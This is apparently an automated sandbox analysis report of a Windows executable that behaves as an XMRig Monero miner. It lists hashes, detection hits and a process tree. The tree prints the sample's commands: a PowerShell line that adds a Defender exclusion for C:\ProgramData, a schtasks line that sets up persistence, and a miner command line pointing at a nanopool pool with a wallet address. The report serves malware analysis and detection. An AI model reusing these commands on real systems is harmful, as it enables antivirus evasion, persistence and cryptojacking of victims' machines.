Analysis
-
max time kernel
77s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
07-02-2023 06:53
Static task
static1
Behavioral task
behavioral1
Sample
ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe
Resource
win7-20220901-en
General
-
Target
ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe
-
Size
2.2MB
-
MD5
04463334a6eae4cd5aa2e41bd17e3b25
-
SHA1
fc7b80c27c655bd7de306c98cdbd810077babc15
-
SHA256
ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90
-
SHA512
360339adafa78e2993f3c7ba10f615436900bd4e9407dced12827ca6d0971b8d7c454611f12d1685f79354756a387a7d78ee6702ed1c5868793bbf4088dc780c
-
SSDEEP
49152:sOnjDmNlqKpXDCUOnjDmNlq/z90f0SpWtBnUhTUEdGloy2:XtU0SotBnUgOG
Malware Config
Signatures
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/1748-103-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-105-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-107-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-108-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-110-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-112-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-113-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-115-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-117-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-118-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1748-120-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-122-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1748-126-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/1496-69-0x0000000000320000-0x00000000005B8000-memory.dmp net_reactor behavioral1/memory/1496-123-0x0000000000320000-0x00000000005B8000-memory.dmp net_reactor -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1496 set thread context of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1120 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1488 powershell.exe 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeLockMemoryPrivilege 1748 vbc.exe Token: SeLockMemoryPrivilege 1748 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1748 vbc.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1496 wrote to memory of 1488 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 28 PID 1496 wrote to memory of 1488 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 28 PID 1496 wrote to memory of 1488 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 28 PID 1496 wrote to memory of 616 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 29 PID 1496 wrote to memory of 616 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 29 PID 1496 wrote to memory of 616 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 29 PID 616 wrote to memory of 1120 616 cmd.exe 31 PID 616 wrote to memory of 1120 616 cmd.exe 31 PID 616 wrote to memory of 1120 616 cmd.exe 31 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33 PID 1496 wrote to memory of 1748 1496 ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe"C:\Users\Admin\AppData\Local\Temp\ac1585ecff0d275e852f9d35792879bda062537ae12267306108d55873987e90.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "SRIKA" /tr "C:\ProgramData\versionApp\SRIKA.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "SRIKA" /tr "C:\ProgramData\versionApp\SRIKA.exe"3⤵
- Creates scheduled task(s)
PID:1120
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1748
-